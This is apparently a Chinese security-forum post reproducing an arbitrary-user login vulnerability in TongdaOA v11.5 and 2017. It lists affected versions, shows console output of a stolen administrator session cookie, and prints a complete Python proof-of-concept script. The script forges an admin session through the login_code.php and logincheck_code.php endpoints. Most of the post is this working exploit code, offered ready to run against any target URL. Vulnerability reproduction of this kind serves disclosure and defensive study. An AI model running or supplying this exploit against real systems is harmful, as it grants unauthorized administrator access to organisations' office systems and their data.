问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
TongdaOA v11.5 login_code.php 任意用户登录
# TongdaOA v11.5 login_code.php 任意用户登录 ## 漏洞描述 TongdaOA是一套办公系统。2020年04月17日, TongdaOA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。...
TongdaOA v11.5 login\_code.php 任意用户登录 ===================================== 漏洞描述 ---- TongdaOA是一套办公系统。2020年04月17日, TongdaOA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。 影响版本 ---- TongdaOA 2017版 TongdaOA版本 V11.X < V11.5 环境搭建 ---- 漏洞环境下载 ```plain https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe ``` 双击安装即可 ![img](https://shs3.b.qianxin.com/butian_public/f606160fadb85a98f64e27ed4ab2990cb32cd56053009.jpg) 漏洞复现 ---- 使用[POC](https://github.com/NS-Sp4ce/TongDaOA-Fake-User/blob/master/POC.py)获取管理员的Cookie ```plain root@kali:~/桌面# python3 1.py -v 11 -u http://xx.xxx.xxx.xxx [+]Get Available COOKIE:PHPSESSID=sr3f46qg6539khd3e3rrucoa72; path=/ ``` 成功获得Cookie,添加Cookie访问 ```php /general/index.php?isIE=0&modify_pwd=0 ``` ![img](https://shs3.b.qianxin.com/butian_public/f89847248ebff4d73283d1b3b488f2fa628cad8912104.jpg) 漏洞POC ----- ```python ''' @Author : Sp4ce @Date : 2020-03-17 23:42:16 LastEditors : Sp4ce LastEditTime : 2020-08-27 10:21:44 @Description : Challenge Everything. ''' import requests from random import choice import argparse import json USER_AGENTS = [ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", ] headers={} def getV11Session(url): checkUrl = url+'/general/login_code.php' try: headers["User-Agent"] = choice(USER_AGENTS) res = requests.get(checkUrl,headers=headers) resText = str(res.text).split('{') codeUid = resText[-1].replace('}"}', '').replace('\r\n', '') getSessUrl = url+'/logincheck_code.php' res = requests.post( getSessUrl, data={'CODEUID': '{'+codeUid+'}', 'UID': int(1)},headers=headers) tmp_cookie = res.headers['Set-Cookie'] headers["User-Agent"] = choice(USER_AGENTS) headers["Cookie"] = tmp_cookie check_available = requests.get(url + '/general/index.php',headers=headers) if '用户未登录' not in check_available.text: if '重新登录' not in check_available.text: print('[+]Get Available COOKIE:' + tmp_cookie) else: print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.') except: print('[-]Something Wrong With '+url) def get2017Session(url): checkUrl = url+'/ispirit/login_code.php' try: headers["User-Agent"] = choice(USER_AGENTS) res = requests.get(checkUrl,headers=headers) resText = json.loads(res.text) codeUid = resText['codeuid'] codeScanUrl = url+'/general/login_code_scan.php' res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int( 1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers) resText = json.loads(res.text) status = resText['status'] if status == str(1): getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid res = requests.get(getCodeUidUrl) tmp_cookie = res.headers['Set-Cookie'] headers["User-Agent"] = choice(USER_AGENTS) headers["Cookie"] = tmp_cookie check_available = requests.get(url + '/general/index.php',headers=headers) if '用户未登录' not in check_available.text: if '重新登录' not in check_available.text: print('[+]Get Available COOKIE:' + tmp_cookie) else: print('[-]Something Wrong With ' + url + ',Maybe Not Vulnerable.') else: print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable ?') except: print('[-]Something Wrong With '+url) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-v", "--tdoaversion", type=int, choices=[11, 2017], help="Target TongDa OA Version. e.g: -v 11、-v 2017") parser.add_argument( "-url", "--targeturl", type=str, help="Target URL. e.g: -url 192.168.2.1、-url http://192.168.2.1" ) args = parser.parse_args() url = args.targeturl if 'http://' not in url: url = 'http://' + url if args.tdoaversion == 11: getV11Session(url) elif args.tdoaversion == 2017: get2017Session(url) else: parser.print_help() ``` 若有收获,就点个赞吧
发表于 2024-07-12 18:44:25
阅读 ( 882 )
分类:
OA产品
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!